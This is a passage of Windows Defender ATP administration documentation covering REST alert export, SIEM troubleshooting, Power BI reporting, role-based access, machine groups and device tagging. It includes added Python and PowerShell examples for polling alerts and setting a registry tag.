"IoaDefinitiondId":"7f1c3609-a3ff-40e2-995b-c01770161d68",
"UserName":null,
"AlertPart":0,
"FullId":"636207535742330111_-1114309685:9DE735BA9FF87725E392C6DFBEB2AF279035CDE229FCC00D28C0F3242C5A50AF",
"LastProcessedTimeUtc":"2017-01-23T11:33:45.0760449Z",
"ThreatCategory":null,
"ThreatFamily":null,
"ThreatName":null,
"RemediationAction":null,
"RemediationIsSuccess":null,
"Source":"Windows Defender ATP",
"Md5":null,
"Sha256":null,
"WasExecutingWhileDetected":null,
"FileHash":"69484ca722b4285a234896a2e31707cbedc59ef9",
"IocUniqueId":"9DE735BA9FF87725E392C6DFBEB2AF279035CDE229FCC00D28C0F3242C5A50AF"}

Code examples
Get access token
The following code example demonstrates how to obtain an access token and call the Windows Defender ATP API.

// Requires the ADAL library (Microsoft.IdentityModel.Clients.ActiveDirectory, v2.x API).
using Microsoft.IdentityModel.Clients.ActiveDirectory;

// tenantId, clientId and clientSecret come from the Azure AD application registration noted above;
// resource is the protected resource URI (https://graph.windows.net in the token request above).
AuthenticationContext context = new AuthenticationContext(string.Format("https://login.windows.net/{0}/oauth2", tenantId));
ClientCredential clientCredentials = new ClientCredential(clientId, clientSecret);
AuthenticationResult authenticationResult = context.AcquireToken(resource, clientCredentials);

Use token to connect to the alerts endpoint

using System;
using System.Net.Http;
using System.Net.Http.Headers;

HttpClient httpClient = new HttpClient();
// Authorization: Bearer <token>, as required by the request header table above.
httpClient.DefaultRequestHeaders.Authorization = new AuthenticationHeaderValue(authenticationResult.AccessTokenType, authenticationResult.AccessToken);
// Use the alerts endpoint for your region (EU shown); the documented path is /api/alerts.
HttpResponseMessage response = httpClient.GetAsync("https://wdatp-alertexporter-eu.windows.com/api/alerts").GetAwaiter().GetResult();
string alertsJson = response.Content.ReadAsStringAsync().Result;
Console.WriteLine("Got alert list: {0}", alertsJson);

Error codes
The Windows Defender ATP REST API returns the following error codes caused by an invalid request.

| HTTP error code | Description |
|---|---|
| 401 | Malformed request or invalid token. |
| 403 | Unauthorized exception - any of the domains is not managed by the tenant administrator or tenant state is deleted. |
| 500 | Error in the service. |
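The client credentials token request, the documented query parameters, the 401/403/500 codes and an incremental poll that advances sinceTimeUtc on LastProcessedTimeUtc, as an added Python example (not code from the page or from Microsoft); the `transport` callable, the constructed sample detections and `demo()` are assumptions so it runs offline.

```python
"""Incremental pull of Windows Defender ATP alerts over the SIEM REST API (added example, not
code from the page or from Microsoft). Endpoints, query parameters, token fields and error codes
are the ones documented above; `transport`, the sample detections and demo() are constructed."""
import json
import re
import time
from urllib.parse import urlencode

TOKEN_URL = "https://login.microsoftonline.com/{tenant_id}/oauth2/token"
RESOURCE = "https://graph.windows.net"
ALERTS_URL = {
    "eu": "https://wdatp-alertexporter-eu.windows.com/api/alerts",
    "us": "https://wdatp-alertexporter-us.windows.com/api/alerts",
    "uk": "https://wdatp-alertexporter-uk.windows.com/api/alerts",
}
# Error codes the page documents for an invalid request.
ERRORS = {
    401: "Malformed request or invalid token.",
    403: "Unauthorized exception - a domain is not managed by the tenant administrator or the tenant state is deleted.",
    500: "Error in the service.",
}
# ISO 8601 duration such as PT10M, the only accepted shape for the `ago` parameter.
ISO_DURATION = re.compile(r"^P(?!$)(\d+Y)?(\d+M)?(\d+W)?(\d+D)?(T(?=\d)(\d+H)?(\d+M)?(\d+S)?)?$")


def token_request(tenant_id, client_id, client_secret):
    """Client-credentials grant: returns (url, form body) for the POST to the token endpoint."""
    body = urlencode({"resource": RESOURCE, "client_id": client_id,
                      "client_secret": client_secret, "grant_type": "client_credentials"})
    return TOKEN_URL.format(tenant_id=tenant_id), body


def token_is_fresh(token, now=None, skew=300):
    """True while the token stays valid for at least `skew` seconds; expires_on is epoch seconds."""
    now = time.time() if now is None else now
    return int(token["expires_on"]) - skew > now


def alerts_url(region, since=None, until=None, ago=None, limit=None, machinegroups=()):
    """Build the GET URL from the documented query parameters; a malformed `ago` is rejected."""
    if ago is not None and not ISO_DURATION.match(ago):
        raise ValueError("ago must be an ISO 8601 duration such as PT10M")
    params = [(k, v) for k, v in (("sinceTimeUtc", since), ("untilTimeUtc", until),
                                  ("ago", ago), ("limit", limit)) if v is not None]
    params += [("machinegroups", g) for g in machinegroups]  # repeatable parameter
    return ALERTS_URL[region] + ("?" + urlencode(params) if params else "")


def explain_status(status):
    """Map an HTTP status to the meaning the page documents."""
    return ERRORS.get(status, "unexpected HTTP status %d" % status)


def group_detections(raw):
    """The endpoint returns raw detection parts; regroup them by AlertId, drop re-delivered parts
    that share a FullId, and order each alert's parts by AlertPart."""
    alerts = {}
    for det in raw:
        alerts.setdefault(det["AlertId"], {}).setdefault(det["FullId"], det)
    return {aid: sorted(parts.values(), key=lambda d: d["AlertPart"])
            for aid, parts in alerts.items()}


def pull_alerts(transport, token, region, since):
    """One poll of the alerts endpoint; returns (grouped alerts, next sinceTimeUtc).
    transport(url, headers) -> (status, body) is injected so the caller picks the HTTP stack."""
    headers = {"Authorization": "Bearer " + token["access_token"]}  # header the API requires
    status, body = transport(alerts_url(region, since=since), headers)
    if status != 200:
        raise RuntimeError("HTTP %d: %s" % (status, explain_status(status)))
    raw = json.loads(body)
    # Advance the window on LastProcessedTimeUtc (arrival at the backend), the field the page says
    # to use for the time range, not AlertTime, so late-arriving detections are not skipped.
    high_water = max([since] + [d["LastProcessedTimeUtc"] for d in raw])  # same-format UTC strings
    return group_detections(raw), high_water


# Constructed sample response: two parts of one alert (one part re-delivered) plus a second alert.
SAMPLE_DETECTIONS = [
    {"AlertId": "constructed_alert_1", "FullId": "constructed_alert_1:p0", "AlertPart": 0,
     "AlertTitle": "Suspicious PowerShell commandline", "LastProcessedTimeUtc": "2017-01-23T11:33:45.0760449Z"},
    {"AlertId": "constructed_alert_1", "FullId": "constructed_alert_1:p1", "AlertPart": 1,
     "AlertTitle": "Suspicious PowerShell commandline", "LastProcessedTimeUtc": "2017-01-23T11:33:46.0000000Z"},
    {"AlertId": "constructed_alert_1", "FullId": "constructed_alert_1:p1", "AlertPart": 1,
     "AlertTitle": "Suspicious PowerShell commandline", "LastProcessedTimeUtc": "2017-01-23T11:33:46.0000000Z"},
    {"AlertId": "constructed_alert_2", "FullId": "constructed_alert_2:p0", "AlertPart": 0,
     "AlertTitle": "Communication to a malicious network destination", "LastProcessedTimeUtc": "2017-01-23T11:30:00.0000000Z"},
]


def demo(status=200):
    """Run one poll against a stub transport that answers with SAMPLE_DETECTIONS."""
    def stub_transport(url, headers):
        assert headers["Authorization"].startswith("Bearer ") and "sinceTimeUtc=" in url
        return status, json.dumps(SAMPLE_DETECTIONS)
    token = {"access_token": "constructed-token", "expires_on": str(int(time.time()) + 3599)}
    return pull_alerts(stub_transport, token, "eu", since="2017-01-23T00:00:00.000")
```

Store the returned high-water mark between runs and pass it back as `since`, so each poll only fetches detections that arrived at the backend after the previous one.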

Related topics
Enable SIEM integration in Windows Defender ATP
Configure ArcSight to pull Windows Defender ATP alerts
Configure Splunk to pull Windows Defender ATP alerts
Windows Defender ATP alert API fields
Troubleshoot SIEM tool integration issues
Troubleshoot SIEM tool integration issues
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You might need to troubleshoot issues while pulling alerts in your SIEM tools.
This page provides detailed steps to troubleshoot issues you might encounter.

Learn how to get a new client secret


If your client secret expires or if you've misplaced the copy provided when you were enabling the SIEM tool
application, you'll need to get a new secret.
1. Log in to the Azure management portal.
2. Select Azure Active Directory.
3. Select your tenant.
4. Click App registrations. Then in the applications list, select the application:
For SIEM: https://WindowsDefenderATPSiemConnector
For Threat intelligence API: https://WindowsDefenderATPCustomerTiConnector
5. Select Keys section, then provide a key description and specify the key validity duration.
6. Click Save. The key value is displayed.
7. Copy the value and save it in a safe place.

Error when getting a refresh access token


If you encounter an error when trying to get a refresh token when using the threat intelligence API or SIEM tools,
you'll need to add a reply URL for the relevant application in Azure Active Directory.
1. Log in to the Azure management portal.
2. Select Azure Active Directory.
3. Select your tenant.
4. Click App Registrations. Then in the applications list, select the application:
For SIEM: https://WindowsDefenderATPSiemConnector
For Threat intelligence API: https://WindowsDefenderATPCustomerTiConnector
5. Add the following URL:
For the European Union:
https://winatpmanagement-eu.securitycenter.windows.com/UserAuthenticationCallback
For the United Kingdom:
https://winatpmanagement-uk.securitycenter.windows.com/UserAuthenticationCallback
For the United States:
https://winatpmanagement-us.securitycenter.windows.com/UserAuthenticationCallback
6. Click Save.

Error while enabling the SIEM connector application


If you encounter an error when trying to enable the SIEM connector application, check the pop-up blocker
settings of your browser. It might be blocking the new window being opened when you enable the capability.

Want to experience Windows Defender ATP? Sign up for a free trial.

Related topics
Enable SIEM integration in Windows Defender ATP
Configure ArcSight to pull Windows Defender ATP alerts
Configure Splunk to pull Windows Defender ATP alerts
Windows Defender ATP alert API fields
Pull Windows Defender ATP alerts using REST API
Create and build Power BI reports using Windows
Defender ATP data
4/22/2019 • 5 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

IMPORTANT
Some information relates to prereleased product which may be substantially modified before it's commercially released.
Microsoft makes no warranties, express or implied, with respect to the information provided here.

TIP
Go to Advanced features in the Settings page to turn on the preview features.
Want to experience Windows Defender ATP? Sign up for a free trial.

Understand the security status of your organization, including the status of machines, alerts, and investigations
using the Windows Defender ATP reporting feature that integrates with Power BI.
Windows Defender ATP supports the use of Power BI data connectors to enable you to connect and access
Windows Defender ATP data using Microsoft Graph.
Data connectors integrate seamlessly in Power BI, and make it easy for power users to query, shape and combine
data to build reports and dashboards that meet the needs of your organization.
You can easily get started by:
Creating a dashboard on the Power BI service
Building a custom dashboard on Power BI Desktop and tweaking it to fit the visual analytics and reporting
requirements of your organization
You can access these options from Windows Defender Security Center. Both the Power BI service and Power BI
Desktop are supported.

Create a Windows Defender ATP dashboard on Power BI service


Windows Defender ATP makes it easy to create a Power BI dashboard by providing an option straight from the
portal.
1. In the navigation pane, select Settings > Power BI reports.
2. Click Create dashboard.
You'll see a notification that things are being loaded.

NOTE
Loading your data in the Power BI service can take a few minutes.

3. Specify the following details:


extensionDataSourceKind: WDATPConnector
extensionDataSourcePath: WDATPConnector
Authentication method: OAuth2
4. Click Sign in. If this is the first time you’re using Power BI with Windows Defender ATP, you’ll need to sign
in and give consent to Windows Defender ATP Power BI app. By providing consent, you’re allowing
Windows Defender ATP Power BI to sign in and read your profile, access your data, and be used for report
refresh.

5. Click Accept. Power BI service will start downloading your Windows Defender ATP data from Microsoft
Graph. After a successful login, you'll see a notification that data is being imported:
NOTE
Depending on the number of onboarded machines, loading your data in the Power BI service can take several
minutes. A larger number of machines might take longer to load.

When the data import is completed and the dataset is ready, you'll see the following notification:

6. Click View dataset to explore your data.


For more information, see Create a Power BI dashboard from a report.

Create a Power BI dashboard from the Power BI portal


1. Log in to Power BI.
2. Click Get Data.
3. Select Microsoft AppSource > My Organization > Get.

4. In the AppSource window, select Apps and search for Windows Defender Advanced Threat Protection.
5. Click Get it now.
6. Specify the following details:
extensionDataSourceKind: WDATPConnector
extensionDataSourcePath: WDATPConnector
Authentication method: OAuth2

7. Click Sign in. If this is the first time you’re using Power BI with Windows Defender ATP, you’ll need to sign
in and give consent to Windows Defender ATP Power BI app. By providing consent, you’re allowing
Windows Defender ATP Power BI to sign in and read your profile, access your data, and be used for report
refresh.
8. Click Accept. Power BI service will start downloading your Windows Defender ATP data from Microsoft
Graph. After a successful login, you'll see a notification that data is being imported:

NOTE
Depending on the number of onboarded machines, loading your data in the Power BI service can take several
minutes. A larger number of machines might take longer to load.

When the data import is completed and the dataset is ready, you'll see the following notification:

9. Click View dataset to explore your data.

Build a custom Windows Defender ATP dashboard in Power BI Desktop


You can create a custom dashboard in Power BI Desktop to create visualizations that cater to the specific views that
your organization requires.
Before you begin
1. Make sure you use Power BI Desktop June 2017 and above. Download the latest version.
2. In the Windows Defender Security Center navigation pane, select Settings > Power BI reports.
3. Click Download connector to download the WDATPPowerBI.zip file and extract it.

4. Create a new directory Microsoft Power BI Desktop\Custom Connectors under the user's Documents folder.
5. Copy WDATPDataConnector.mez from the zip to the directory you just created.
6. Open Power BI Desktop.
7. Click File > Options and settings > Custom data connectors.
8. Select New table and matrix visuals and Custom data connectors and click OK.

NOTE
If you are using Power BI Desktop July 2017 version (or later), you won't need to select New table and matrix
visuals. You'll only need to select Custom data connectors.
9. Restart Power BI Desktop.

Customize the Windows Defender ATP Power BI dashboard


After completing the steps in the Before you begin section, you can proceed with building your custom dashboard.
1. Open WDATPPowerBI.pbit from the zip with Power BI Desktop.
2. If this is the first time you’re using Power BI with Windows Defender ATP, you’ll need to sign in and give
consent to Windows Defender ATP Power BI app. By providing consent, you’re allowing Windows Defender
ATP Power BI to sign in and read your profile, and access your data.
3. Click Accept. Power BI Desktop will start downloading your Windows Defender ATP data from Microsoft
Graph. When all data has been downloaded, you can proceed to customize your reports.

Mashup Windows Defender ATP data with other data sources


You can use Power BI Desktop to analyse data from Windows Defender ATP and mash that data up with other data
sources to gain better security perspective in your organization.
1. In Power BI Desktop, in the Home ribbon, click Get data and search for Windows Defender Advanced
Threat Protection.

2. Click Connect.
3. On the Preview Connector windows, click Continue.
4. If this is the first time you’re using Power BI with Windows Defender ATP, you’ll need to sign in and give
consent to Windows Defender ATP Power BI app. By providing consent, you’re allowing Windows Defender
ATP Power BI to sign in and read your profile, and access your data.

5. Click Accept. Power BI Desktop will start downloading your Windows Defender ATP data from Microsoft
Graph. When all data has been downloaded, you can proceed to customize your reports.
6. In the Navigator dialog box, select the Windows Defender ATP feeds you'd like to download and use in your
reports and click Load. Data will start to be downloaded from the Microsoft Graph.
7. Load other data sources by clicking Get data item in the Home ribbon, and select another data source.
8. Add visuals and select fields from the available data sources.

Using the Power BI reports


There are a couple of tabs on the report that's generated:
Machine and alerts
Investigation results and action center
Secure Score
In general, if you know of a specific threat name, CVE, or KB, you can identify machines with unpatched
vulnerabilities that might be leveraged by threats. This report also helps you determine whether machine-level
mitigations are configured correctly on the machines and prioritize those that might need attention.

Related topic
Beta Create custom Power BI reports
Threat protection report in Windows Defender ATP
5/2/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
The threat protection report provides high-level information about alerts generated in your organization. The
report includes trending information showing the detection sources, categories, severities, statuses, classifications,
and determinations of alerts across time.
The dashboard is structured into two sections:

| Section | Description |
|---|---|
| 1 | Alerts trends |
| 2 | Alert summary |

By default, the alert trends display alert information from the 30-day period ending in the latest full day. To gain
better perspective on trends occurring in your organization, you can fine-tune the reporting period by adjusting the
time period shown. To adjust the time period, select a time range from the drop-down options:
30 days
3 months
6 months
Custom
While the alert trends show trending alert information, the alert summary shows alert information scoped to the
current day.
The alert summary allows you to drill down to a particular alert queue with the corresponding filter applied to it.
For example, clicking the EDR bar in the Detection sources card brings you to the alerts queue with results
showing only alerts generated from EDR detections.

Alert attributes
The report is made up of cards that display the following alert attributes:
Detection sources: shows information about the sensors and detection technologies that provide the data
used by Windows Defender ATP to trigger alerts.
Threat categories: shows the types of threat or attack activity that triggered alerts, indicating possible
focus areas for your security operations.
Severity: shows the severity level of alerts, indicating the collective potential impact of threats to your
organization and the level of response needed to address them.
Status: shows the resolution status of alerts, indicating the efficiency of your manual alert responses and of
automated remediation (if enabled).
Classification & determination: shows how you have classified alerts upon resolution, whether you have
classified them as actual threats (true alerts) or as incorrect detections (false alerts). These cards also show
the determination of resolved alerts, providing additional insight like the types of actual threats found or the
legitimate activities that were incorrectly detected.

Filter data
Use the provided filters to include or exclude alerts with certain attributes.

NOTE
These filters apply to all the cards in the report.

For example, to show data about high-severity alerts only:


1. Under Filters > Severity, select High
2. Ensure that all other options under Severity are deselected.
3. Select Apply.

Related topic
Machine health and compliance report
Machine health and compliance report in Windows
Defender ATP
5/2/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

IMPORTANT
Some information relates to prereleased product which may be substantially modified before it's commercially released.
Microsoft makes no warranties, express or implied, with respect to the information provided here.

The machines status report provides high-level information about the devices in your organization. The report
includes trending information showing the sensor health state, antivirus status, OS platforms, and Windows 10
versions.
The dashboard is structured into two sections:

| Section | Description |
|---|---|
| 1 | Machine trends |
| 2 | Machine summary (current day) |

By default, the machine trends displays machine information from the 30-day period ending in the latest full day.
To gain better perspective on trends occurring in your organization, you can fine-tune the reporting period by
adjusting the time period shown. To adjust the time period, select a time range from the drop-down options:
30 days
3 months
6 months
Custom
While the machine trends show trending machine information, the machine summary shows machine
information scoped to the current day.
The machine trends section allows you to drill down to the machines list with the corresponding filter applied to it.
For example, clicking the Inactive bar in the Sensor health state card brings you to the machines list with results
showing only machines whose sensor status is inactive.

Machine attributes
The report is made up of cards that display the following machine attributes:
Health state: shows information about the sensor state on devices, providing an aggregated view of
devices that are active, experiencing impaired communications, inactive, or where no sensor data is seen.
Antivirus status for active Windows 10 machines: shows the number of machines and status of
Windows Defender Antivirus.
OS platforms: shows the distribution of OS platforms that exist within your organization.
Windows 10 versions: shows the distribution of Windows 10 machines and their versions in your
organization.

Filter data
Use the provided filters to include or exclude machines with certain attributes.
You can select multiple filters to apply from the machine attributes.

NOTE
These filters apply to all the cards in the report.

For example, to show data about Windows 10 machines with Active sensor health state:
1. Under Filters > Sensor health state, select Active.
2. Then select OS platforms > Windows 10.
3. Select Apply.

Related topic
Threat protection report
Partner applications in Microsoft Defender ATP
4/26/2019 • 2 minutes to read

Applies to:
Microsoft Defender Advanced Threat Protection (Windows Defender ATP)
Microsoft Defender ATP supports third-party applications to help enhance the detection, investigation, and threat
intelligence capabilities of the platform.
The support for third-party solutions helps to further streamline, integrate, and orchestrate defenses from other
vendors with Microsoft Defender ATP, enabling security teams to respond more effectively to modern threats.
Microsoft Defender ATP seamlessly integrates with existing security solutions, providing out-of-the-box integration
with SIEM, ticketing and IT service management solutions, managed security service providers (MSSP), IoC
indicator ingestion and matching, automated device investigation and remediation based on external alerts, and
integration with security orchestration and automation response (SOAR) systems.

SIEM integration
Microsoft Defender ATP supports SIEM integration through a variety of methods - specialized SIEM system
interface with out of the box connectors, a generic alert API enabling custom implementations, and an action API
enabling alert status management. For more information, see Enable SIEM integration.

Ticketing and IT service management


Ticketing solution integration helps to implement manual and automatic response processes. Microsoft Defender
ATP can help to create tickets automatically when an alert is generated and resolve the alerts when tickets are
closed using the alerts API.

Security orchestration and automation response (SOAR) integration


Orchestration solutions can help build playbooks and integrate the rich data model and actions that Microsoft
Defender ATP APIs expose to orchestrate responses, such as query for device data, trigger machine isolation,
block/allow, resolve alert and others.

External alert correlation and Automated investigation and remediation


Microsoft Defender ATP offers unique automated investigation and remediation capabilities to drive incident
response at scale.
Integrating the automated investigation and response capability with other solutions such as IDS and firewalls helps
to address alerts and minimize the complexities surrounding network and device signal correlation, effectively
streamlining the investigation and threat remediation actions on devices.
External alerts can be pushed into Microsoft Defender ATP and are presented side-by-side with additional device-based
alerts from Microsoft Defender ATP. This view provides the full context of the alert, with the real process and
the full story of the attack.

Indicators matching
You can use threat-intelligence from providers and aggregators to maintain and use indicators of compromise
(IOCs).
Microsoft Defender ATP allows you to integrate with such solutions and act on IoCs by correlating its rich
telemetry and creating alerts when there's a match; leveraging prevention and automated response capabilities to
block execution and take remediation actions when there's a match.
Microsoft Defender ATP currently supports IOC matching and remediation for file and network indicators.
Blocking is supported for file indicators.

Support for non-Windows platforms


Microsoft Defender ATP provides a centralized security operations experience for Windows as well as non-Windows
platforms. You'll be able to see alerts from various supported operating systems (OS) in the portal and
better protect your organization's network. This experience leverages third-party security products' sensor
data, giving you a unified experience.
Manage portal access using role-based access control
4/22/2019 • 2 minutes to read

Applies to:
Azure Active Directory
Office 365
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Using role-based access control (RBAC), you can create roles and groups within your security operations team to grant appropriate access to the portal. Based on the roles and groups you create, you have fine-grained control over what users with access to the portal can see and do.
Large geo-distributed security operations teams typically adopt a tier-based model to assign and authorize access to security portals. Typical tiers include the following three levels:

TIER    DESCRIPTION
Tier 1  Local security operations team / IT team. This team usually triages and investigates alerts contained within their geolocation and escalates to Tier 2 in cases where an active remediation is required.
Tier 2  Regional security operations team. This team can see all the machines for their region and perform remediation actions.
Tier 3  Global security operations team. This team consists of security experts and is authorized to see and perform all actions from the portal.

Windows Defender ATP RBAC is designed to support your tier- or role-based model of choice and gives you granular control over what roles can see, which machines they can access, and which actions they can take. The RBAC framework is centered around the following controls:
Control who can take specific actions
Create custom roles and control which Windows Defender ATP capabilities they can access, with granularity.
Control who can see information on a specific machine group or groups
Create machine groups by specific criteria such as names, tags, domains, and others, then grant role access to them using a specific Azure Active Directory (Azure AD) user group.
To implement role-based access, you'll need to define admin roles, assign the corresponding permissions to each role, and assign Azure AD user groups to the roles.
Before you begin
Before using RBAC, it's important that you understand the roles that can grant permissions and the consequences
of turning on RBAC.
WARNING
Before enabling the feature, it's important that you have a Global Administrator role or Security Administrator role in Azure
AD and that you have your Azure AD groups ready to reduce the risk of being locked out of the portal.

When you first log in to Windows Defender Security Center, you're granted either full access or read only access.
Full access rights are granted to users with Security Administrator or Global Administrator roles in Azure AD. Read
only access is granted to users with a Security Reader role in Azure AD.
Someone with a Windows Defender ATP Global administrator role has unrestricted access to all machines, regardless of their machine group association and the Azure AD user group assignments.

WARNING
Initially, only those with Azure AD Global Administrator or Security Administrator rights will be able to create and assign roles
in Windows Defender Security Center, therefore, having the right groups ready in Azure AD is important.
Turning on role-based access control will cause users with read-only permissions (for example, users assigned to
Azure AD Security reader role) to lose access until they are assigned to a role.
Users with admin permissions are automatically assigned the default built-in Windows Defender ATP global administrator role
with full permissions. After opting in to use RBAC, you can assign additional users that are not Azure AD Global or Security
Administrators to the Windows Defender ATP global administrator role.
After opting in to use RBAC, you cannot revert to the initial roles as when you first logged into the portal.

Related topic
Create and manage machine groups in Windows Defender ATP
Create and manage roles for role-based access control
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Create roles and assign the role to an Azure Active Directory group
The following steps guide you on how to create roles in Windows Defender Security Center. It assumes that you
have already created Azure Active Directory user groups.
1. In the navigation pane, select Settings > Roles.
2. Click Add role.
3. Enter the role name, description, and permissions you'd like to assign to the role.
Role name
Description
Permissions
View data - Users can view information in the portal.
Alerts investigation - Users can manage alerts, initiate automated investigations, collect
investigation packages, manage machine tags, and export machine timeline.
Active remediation actions - Users can take response actions and approve or dismiss pending
remediation actions.
Manage portal system settings - Users can configure storage settings, SIEM and threat intel
API settings (applies globally), advanced settings, automated file uploads, roles and machine
groups.

NOTE
This setting is only available in the Windows Defender ATP administrator (default) role.

Manage security settings - Users can configure alert suppression settings, manage
allowed/blocked lists for automation, manage folder exclusions for automation, onboard and
offboard machines, and manage email notifications.
4. Click Next to assign the role to an Azure AD group.
5. Use the filter to select the Azure AD group that you'd like to add to this role.
6. Click Save and close.
7. Apply the configuration settings.
After creating roles, you'll need to create a machine group and provide access to the machine group by assigning it
to a role that you just created.
Edit roles
1. Select the role you'd like to edit.
2. Click Edit.
3. Modify the details or the groups that are assigned to the role.
4. Click Save and close.

Delete roles
1. Select the role you'd like to delete.
2. Click the drop-down button and select Delete role.

Related topics
Use basic permissions to access the portal
Create and manage machine groups
Create and manage machine groups in Windows Defender ATP
4/5/2019 • 3 minutes to read

Applies to:
Azure Active Directory
Office 365
Windows Defender Advanced Threat Protection (Windows Defender ATP)
In an enterprise scenario, security operation teams are typically assigned a set of machines. These machines are
grouped together based on a set of attributes such as their domains, computer names, or designated tags.
In Windows Defender ATP, you can create machine groups and use them to:
Limit access to related alerts and data to specific Azure AD user groups with assigned RBAC roles
Configure different auto-remediation settings for different sets of machines

TIP
For a comprehensive look into RBAC application, read: Is your SOC running flat with RBAC.

As part of the process of creating a machine group, you'll:


Set the automated remediation level for that group. For more information on remediation levels, see Use
Automated investigation to investigate and remediate threats.
Specify the matching rule that determines which machines belong to the group, based on machine name, domain, tags, and OS platform. If a machine also matches other groups, it is added only to the highest ranked machine group.
Select the Azure AD user group that should have access to the machine group.
Rank the machine group relative to other groups after it is created.

NOTE
A machine group is accessible to all users if you don’t assign any Azure AD groups to it.

Create a machine group


1. In the navigation pane, select Settings > Machine groups.
2. Click Add machine group.
3. Enter the group name and automation settings and specify the matching rule that determines which
machines belong to the group.
Machine group name
Automation level
Semi - require approval for any remediation
Semi - require approval for non-temp folders remediation
Semi - require approval for core folders remediation
Full - remediate threats automatically

NOTE
For more information on automation levels, see Understand the Automated investigation flow.

Description
Members

TIP
If you want to group machines by organizational unit, you can configure the registry key for the group affiliation. For
more information on device tagging, see Manage machine group and tags.

4. Preview several machines that will be matched by this rule. If you are satisfied with the rule, click the Access
tab.
5. Assign the user groups that can access the machine group you created.

NOTE
You can only grant access to Azure AD user groups that have been assigned to RBAC roles.

6. Click Close. The configuration changes are applied.

Manage machine groups


You can promote or demote the rank of a machine group so that it is given higher or lower priority during
matching. When a machine is matched to more than one group, it is added only to the highest ranked group. You
can also edit and delete groups.

WARNING
Deleting a machine group may affect email notification rules. If a machine group is configured under an email notification rule,
it will be removed from that rule. If the machine group is the only group configured for an email notification, that email
notification rule will be deleted along with the machine group.

By default, machine groups are accessible to all users with portal access. You can change the default behavior by
assigning Azure AD user groups to the machine group.
Machines that are not matched to any groups are added to Ungrouped machines (default) group. You cannot
change the rank of this group or delete it. However, you can change the remediation level of this group, and define
the Azure AD user groups that can access this group.

NOTE
Applying changes to machine group configuration may take up to several minutes.

Related topics
Manage portal access using role-based access control
Get list of tenant machine groups using Graph API
Create and manage machine tags
4/5/2019 • 2 minutes to read

Add tags on machines to create a logical group affiliation. Machine group affiliation can represent geographic
location, specific activity, importance level and others.
You can create machine groups in the context of role-based access control (RBAC) to control who can take specific actions or who can see information on a specific machine group or groups, by assigning the machine group to a user group.
For more information, see Manage portal access using role-based access control.
You can also use machine groups to assign specific remediation levels to apply during automated investigations.
For more information, see Create and manage machine groups.
In an investigation, you can filter the Machines list to just specific machine groups by using the Groups filter.
Machine tags support proper mapping of the network, enabling you to attach different tags to capture context and
to enable dynamic list creation as part of an incident.
You can add tags on machines using the following ways:
By setting a registry key value
By using the portal

Add machine tags by setting a registry key value

Add tags on machines which can be used as a filter in Machines list view. You can limit the machines in the list by
selecting the Tag filter on the Machines list.

NOTE
Applicable only on the following machines:
Windows 10, version 1709 or later
Windows Server, version 1803 or later
Windows Server 2016
Windows Server 2012 R2

Machines with similar tags can be handy when you need to apply contextual action on a specific list of machines.
Use the following registry key entry to add a tag on a machine:
Registry key: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection\DeviceTagging\
Registry key value (string): Group

NOTE
The device tag is part of the machine information report that's generated once a day. As an alternative, you can restart the endpoint, which sends a new machine information report.
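As an added example that is not part of the original page, the following PowerShell, run in an elevated session on the endpoint, creates the DeviceTagging key if it is missing, writes the Group value as a REG_SZ, and reads it back so that a mistyped path or a value of the wrong type is caught immediately rather than a day later when the report does not change. The tag name FinanceEU is a placeholder.

```powershell
# Added example: set a Windows Defender ATP device tag through the registry.
# Run in an elevated PowerShell session on the endpoint (writing under HKLM requires admin).
# 'FinanceEU' is a placeholder tag; substitute the tag you want to filter on in the portal.

$tagKey  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection\DeviceTagging'
$tagName = 'FinanceEU'

# The DeviceTagging key is not present by default; -Force also creates any missing parent keys.
if (-not (Test-Path -Path $tagKey)) {
    New-Item -Path $tagKey -Force | Out-Null
}

# The sensor reads a string (REG_SZ) value named 'Group'; -Type String avoids
# accidentally creating a DWORD or ExpandString value with the same name.
Set-ItemProperty -Path $tagKey -Name 'Group' -Value $tagName -Type String

# Read the value back to confirm what the next machine information report will carry.
$current = (Get-ItemProperty -Path $tagKey -Name 'Group').Group
if ($current -ne $tagName) {
    throw "DeviceTagging\Group is '$current', expected '$tagName'"
}
Write-Output "DeviceTagging\Group set to '$current'. The portal picks it up with the daily report or after a restart."

# To remove the tag again, delete only the value, not the whole policy key:
#   Remove-ItemProperty -Path $tagKey -Name 'Group'
```

The same snippet can be pushed through Group Policy Preferences or a configuration-management tool to tag whole organizational units, which is the use case the tip above refers to.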

Add machine tags using the portal


Dynamic context capturing is achieved using tags. By tagging machines, you can keep track of individual machines
in your organization. After adding tags on machines, you can apply the Tags filter on the Machines list to get a
narrowed list of machines with the tag.
1. Select the machine that you want to manage tags on. You can select or search for a machine from any of the
following views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the machine name from the list of machines.
Search box - Select Machine from the drop-down menu and enter the machine name.
You can also get to the alert page through the file and IP views.
2. Open the Actions menu and select Manage tags.

3. Enter tags on the machine. To add more tags, click the + icon.
4. Click Save and close.
Tags are added to the machine view and will also be reflected on the Machines list view. You can then use
the Tags filter to see the relevant list of machines.
Manage machine tags
You can manage tags from the Actions button or by selecting a machine from the Machines list and opening the
machine details panel.
Add machine tags using APIs
For more information, see Add or remove machine tags API.
Configure managed security service provider integration
4/5/2019 • 8 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

IMPORTANT
Some information relates to prereleased product which may be substantially modified before it's commercially released.
Microsoft makes no warranties, express or implied, with respect to the information provided here.

You'll need to take the following configuration steps to enable the managed security service provider (MSSP) integration.

NOTE
The following terms are used in this article to distinguish between the service provider and service consumer:
MSSPs: Security organizations that offer to monitor and manage security devices for an organization.
MSSP customers: Organizations that engage the services of MSSPs.

The integration will allow MSSPs to take the following actions:


Get access to MSSP customer's Windows Defender Security Center portal
Get email notifications, and
